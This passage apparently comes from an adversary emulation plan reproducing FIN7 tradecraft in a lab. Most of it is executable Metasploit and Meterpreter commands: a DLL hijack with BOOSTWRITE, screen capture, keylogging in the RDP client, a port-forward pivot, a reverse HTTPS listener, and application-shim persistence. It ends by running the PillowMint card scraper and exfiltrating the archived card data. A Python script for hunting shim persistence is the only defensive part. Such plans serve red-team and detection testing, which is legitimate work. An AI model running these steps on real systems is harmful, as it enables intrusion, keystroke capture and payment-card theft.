Switch to the newly received Meterpreter shell created by `hollow.exe`:

```
[msf]> sessions -i 2
```

Upload `BOOSTWRITE.dll` to `C:\Windows\Syswow64\`:

```
meterpreter > upload /home/<attacker>/Enterprise/fin7/Resources/Step7/BOOSTWRITE.dll "C:\\Windows\\SysWOW64\\srrstr.dll"
```

Launch `SystemPropertiesAdvanced.exe` to execute the DLL hijack:

```
meterpreter > execute -f "cmd.exe /c C:\\Windows\\Syswow64\\SystemPropertiesAdvanced.exe"
```

You should receive a new Meterpreter session.

Switch back to the Python HTTP server `tmux` window:

```
Ctrl+b n
```

Stop the Python HTTP server, as it is no longer needed:

```
Ctrl+c
```

Exit the HTTP server `tmux` window:

```
exit
```
### Cited Intelligence

- BOOSTWRITE is a loader that has been launched via abuse of the DLL search order of applications which load legitimate services. This has included matching names of legitimate DLLs to force applications to import BOOSTWRITE DLLs instead of the legitimate DLLs. [2]
## Step 8 - User Monitoring (Evaluations Step 18)

Step 8 focuses on emulating user monitoring activity. Adversary emulation begins by migrating into `explorer.exe` from `svchost.exe` (T1055). Next, the Metasploit `screen_spy` module is leveraged for screen capture (T1113). Upon completing the screen capture, the Meterpreter session is migrated into `mstsc.exe` (T1056.001) and a keylogger is deployed via Meterpreter (T1056.001).
### Procedures

#### 8.A - User Monitoring (T1055, T1113, T1055, T1056.001)

On `itadmin`, begin roleplaying as the legitimate `<domain_admin>` user:

Log in to `itadmin` as `<domain_admin>`:

```
xfreerdp +clipboard /u:<domain>\\<domain_admin> /p:"<domain_admin_password>" /v:<itadmin_ip>
```

Open the Remote Desktop Connection client:

```
windows key (or type in search) > mstsc.exe > enter
```

On the Linux Attack Platform:

Background the current Meterpreter session:

```
meterpreter > background
```

Perform 180 screen captures using Metasploit's `screen_spy` module through the `hollow.exe` Meterpreter session:

```
use post/windows/gather/screen_spy
set COUNT 180
set DELAY 1
set VIEW_SCREENSHOTS false
set SESSION 2
exploit
```

Wait for the `screen_spy` module to complete, then confirm that the screenshots were recorded:

```
msf> loot -t screenspy.screenshot
```

Interact with the `hollow.exe` Meterpreter session:

```
msf> sessions -i 2
```

Migrate into `mstsc.exe` (RDP client):

```
meterpreter > migrate -N mstsc.exe
```

Start keylogging within `mstsc.exe`:

```
meterpreter > keyscan_start
```

Switch back to `itadmin` and continue roleplaying as the legitimate `<domain_admin>` user:

Enter an RDP session using the `mstsc.exe` RDP client:

```
IP Address: <accounting_ip>
Username: <domain>\<domain_admin>
Password: <domain_admin_password>
```

Back on the Linux Attack Platform:

Dump the logged keys:

```
meterpreter > keyscan_dump
```

Stop the keylogging process:

```
meterpreter > keyscan_stop
```
### Cited Intelligence

- The Carbanak malware is capable of recording video of a victim's desktop and performing keylogging. [7, 21]
## Step 9 - Setup Shim Persistence (Evaluations Step 19)

Step 9 focuses on emulating persistence techniques. Adversary emulation begins with a valid logon to the accounting workstation as user kmitnick (T1078). After establishing an RDP session from `itadmin` to `accounting` over TCP port 3389 (T1021, T1090), `powershell.exe` is spawned from `powershell.exe` (T1059). The `powershell.exe` executable then executes base64 encoded commands (T1027) to download `dll329.dll` and `sdbE376` from the C2 server (T1105). The executable `sdbinst.exe` is then used to install `sdbE376.tmp` for application shimming (T1546.011).
### Procedures

#### 9.A - Pivot to Accounting (T1078.003, T1021, T1090, T1059.001, T1027)

On the Linux Attack Platform:

Background the current Meterpreter session:

```
meterpreter > background
```

Create a `reverse_https` Meterpreter listener on port 53:

```
msf > handler -p windows/meterpreter/reverse_https -H 192.168.0.4 -P 53
```

Interact with your Boostwrite shell on `itadmin`:

```
msf > sessions -i 3
```

Create a portfwd to tunnel port 3389 from the Linux Attack Platform to the Accounting workstation:

```
meterpreter > portfwd add -l 3389 -p 3389 -r <accounting_ip>
```

Background this Meterpreter session:

```
meterpreter > background
```

On your Ubuntu machine:

RDP to `accounting` through the TCP tunnel from the Linux Attack Platform, mounting a local folder as a drive:

```
xfreerdp +clipboard /u:<domain>\\<domain_admin> /p:"<domain_admin_password>" /v:192.168.0.4 /drive:X,/home/attack/Enterprise/fin7/Resources/Step9
```
#### 9.B - Setup Shim Persistence (T1105, T1546.011)

On `accounting`:

Open an administrative PowerShell session.

Paste and run the following encoded PowerShell command to prep and install the application shim (the encoded command string itself is not reproduced in this copy of the plan):

```
powershell > powershell -noprofile -encodedCommand "<encoded_command>"
```

Note: this PowerShell command places the files needed for the shim persistence into the `C:\Windows\Temp` directory, adds a registry key for the DLL to be installed as a shim to `HKLM:\Software\Microsoft\DRM\`, and lastly runs `sdbinst.exe` to perform the installation.
### Cited Intelligence

- The Carbanak malware is capable of performing network tunneling. [21]
- FIN7 has utilized terminal services such as Remote Desktop Protocol (RDP) to move laterally within environments. [9]
- FIN7 has leveraged an application shim database registered using the sdbinst.exe utility to achieve persistence on systems in multiple environments. To install and register the malicious shim database, FIN7 has used custom Base64 encoded PowerShell scripts. [24]
## Step 10 - Steal Payment Data (Evaluations Step 20)

Step 10 focuses on stealing payment data from `AccountingIQ.exe`. `AccountingIQ.exe` is a fake payment application meant to mimic credit card data processing. The emulation procedure begins with the machine being rebooted, which in turn queries `HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB`, which loads the previously placed `dll329.dll` (T1546.011). `AccountingIQ.exe` then injects into `SyncHost.exe` (T1071. The executable `rundll32.exe` then communicates back to the C2 host via HTTPS over port 53 (T1071.001, T1573). The executable `debug.exe` is then downloaded from the C2 server (T1105) and performs process discovery tasks (T1057). `rundll32.exe` then downloads `7za.exe` from the C2 server and zips up the previously dumped payment data.
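The shim persistence set up in Step 9 and triggered here in Step 10 is visible in two places a defender can inspect without any third-party tooling: the `sdbinst.exe` invocation itself, and the `AppCompatFlags\InstalledSDB` and `AppCompatFlags\Custom` registry keys that record which database is applied to which executable. The Python below is an added hunting example for this page, not part of the plan; it parses constructed `reg query /s`-style output of those two keys, joins them so each shimmed executable is listed with its database description and on-disk path, and flags `sdbinst.exe` command lines whose source database sits in a temp directory or lacks the `.sdb` extension (the plan's `sdbE376.tmp` in `C:\Windows\Temp`). The GUID, timestamps, description and the `-q` quiet switch in the sample command lines are constructed; the key layout (`Custom\<exe>` holding `{GUID}.sdb` values that point at `InstalledSDB\{GUID}`) is how `sdbinst.exe` registers a custom database.

```python
"""Added example: hunt for application-shim persistence (Steps 9 and 10).

Sources checked (all sample data below is constructed for this page):
  * `reg query ... /s` text for AppCompatFlags\InstalledSDB and AppCompatFlags\Custom
  * process-creation records for sdbinst.exe
"""
import ntpath
import re

APPCOMPAT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags"
EXPECTED_SDB_DIR = "c:\\windows\\apppatch\\custom\\"
TEMP_DIRS = ("c:\\windows\\temp\\", "\\appdata\\local\\temp\\", "c:\\users\\public\\")
PATH_ARG = re.compile(r'"([a-z]:\\[^"]+)"|([a-z]:\\\S+)')   # first absolute path on a command line

SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{7f0c3e2a-1111-2222-3333-444455556666}
    DatabaseDescription    REG_SZ    AccountingIQ
    DatabasePath    REG_SZ    C:\Windows\AppPatch\Custom\{7f0c3e2a-1111-2222-3333-444455556666}.sdb
    DatabaseType    REG_DWORD    0x10000
    DatabaseInstallTimeStamp    REG_QWORD    0x1d6c4e0b2a3f5c0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\AccountingIQ.exe
    {7f0c3e2a-1111-2222-3333-444455556666}.sdb    REG_QWORD    0x1d6c4e0b2a3f5c0
"""

SAMPLE_PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\sdbinst.exe",
     "CommandLine": r"sdbinst.exe -q C:\Windows\Temp\sdbE376.tmp"},          # Step 9 install
    {"Image": r"C:\Windows\System32\sdbinst.exe",
     "CommandLine": r'sdbinst.exe -q "C:\Program Files\Vendor\compat.sdb"'},  # benign vendor fix
]


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}} from `reg query` output."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            keys[current] = {}
        elif line.startswith(" ") and current is not None:
            parts = re.split(r"\s{2,}", line.strip())
            if len(parts) == 3:
                keys[current][parts[0]] = (parts[1], parts[2])
    return keys


def shim_inventory(text):
    """List every executable with a custom shim, joined to its database details."""
    keys = parse_reg_query(text)
    installed_prefix = APPCOMPAT + "\\InstalledSDB\\"
    custom_prefix = APPCOMPAT + "\\Custom\\"
    installed = {path[len(installed_prefix):].lower(): values
                 for path, values in keys.items() if path.startswith(installed_prefix)}
    findings = []
    for path, values in keys.items():
        if not path.startswith(custom_prefix):
            continue
        exe = path[len(custom_prefix):]
        for value_name in values:                     # each value is "{GUID}.sdb"
            guid = value_name.lower()
            guid = guid[:-4] if guid.endswith(".sdb") else guid
            db = installed.get(guid, {})
            db_path = db.get("DatabasePath", ("", ""))[1]
            findings.append({
                "executable": exe, "sdb_guid": guid,
                "description": db.get("DatabaseDescription", ("", ""))[1],
                "path": db_path,
                "path_outside_apppatch": not db_path.lower().startswith(EXPECTED_SDB_DIR),
            })
    return findings


def suspicious_sdbinst(ev):
    """sdbinst.exe installing a database from a temp directory or without .sdb extension."""
    if ntpath.basename(ev["Image"]).lower() != "sdbinst.exe":
        return False
    match = PATH_ARG.search(ev["CommandLine"].lower())
    if not match:
        return False
    db = match.group(1) or match.group(2)
    return any(t in db for t in TEMP_DIRS) or not db.endswith(".sdb")


if __name__ == "__main__":
    for finding in shim_inventory(SAMPLE_REG_QUERY):
        print(finding)
    for ev in SAMPLE_PROCESS_EVENTS:
        print(suspicious_sdbinst(ev), ev["CommandLine"])
```

On most fleets the `Custom` key is empty, so every entry the inventory returns deserves a look regardless of the path check; the path check exists for databases registered by hand rather than through `sdbinst.exe`, which always copies the file into `AppPatch\Custom`.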
### Procedures

#### 10.A - Execute Shim Persistence (T1138)

On `accounting`:

Reboot the host from the administrative PowerShell session:

```
powershell > restart-computer
```

On your Ubuntu machine:

RDP back into `accounting` via the previously created TCP port 3389 tunnel:

```
xfreerdp +clipboard /u:<domain>\\<domain_admin> /p:"<domain_admin_password>" /v:192.168.0.4
```

You should receive a new Meterpreter session on the Linux Attack Platform.
#### 10.B - Obtain Credit Card Data (T1055, T1071.001, T1573)

On the Linux Attack Platform:

Interact with the new Meterpreter session obtained on `accounting`:

```
msf > sessions -i 4
```

Upload the PillowMint credit card scraper as `debug.exe`:

```
meterpreter > upload /home/<attacker>/Enterprise/fin7/Resources/Step10/pillowMint.exe C:\\Users\\Public\\debug.exe
```

Switch to the `C:\Users\Public` directory:

```
meterpreter > cd C:\\Users\\Public
```

Execute PillowMint:

```
meterpreter > execute -f debug.exe -H -i
```

Upload the file archiving utility `7za.exe`:

```
meterpreter > upload /home/<attacker>/Enterprise/fin7/Resources/Step10/7za.exe C:\\Users\\Public\\7za.exe
```

Execute the archiving utility to archive the credit card data:

```
meterpreter > execute -f 7za.exe -H -i -a "a log log.txt"
```

Exfiltrate the previously dumped credit card data:

```
meterpreter > download C:\\Users\\Public\\log.7z /tmp/log.7z
```

FIN7 operations end here.

Background the current Meterpreter session:

```
meterpreter > background
```

Kill all Meterpreter sessions:

```
msf > sessions -K
```

Kill all Metasploit handlers:

```
msf > jobs -K
```

Exit Metasploit:

```
msf > exit
```
### Cited Intelligence

- FIN7 has utilized application shimming to execute a payload stored within the registry. [24]
- Pillowmint has been used to scrape payment card data from memory. [9]
- FIN7 has targeted specific processes related to POS systems, read memory from the processes, and written them to disk for later collection. [19]